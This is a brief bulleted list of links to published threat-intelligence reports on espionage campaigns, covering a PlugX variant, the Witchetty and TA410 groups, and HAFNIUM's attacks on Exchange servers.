* [THOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group](https://unit42.paloaltonetworks.com/thor-plugx-variant/)
* [Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East (Symantec)](https://broadcom-software.security.com/blogs/threat-intelligence/witchetty-steganography-espionage)
* [A lookback under the TA410 umbrella: Its cyberespionage TTPs and activity (ESET)](https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/)
* [HAFNIUM targeting Exchange Servers with 0-day exploits (Microsoft)](https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/)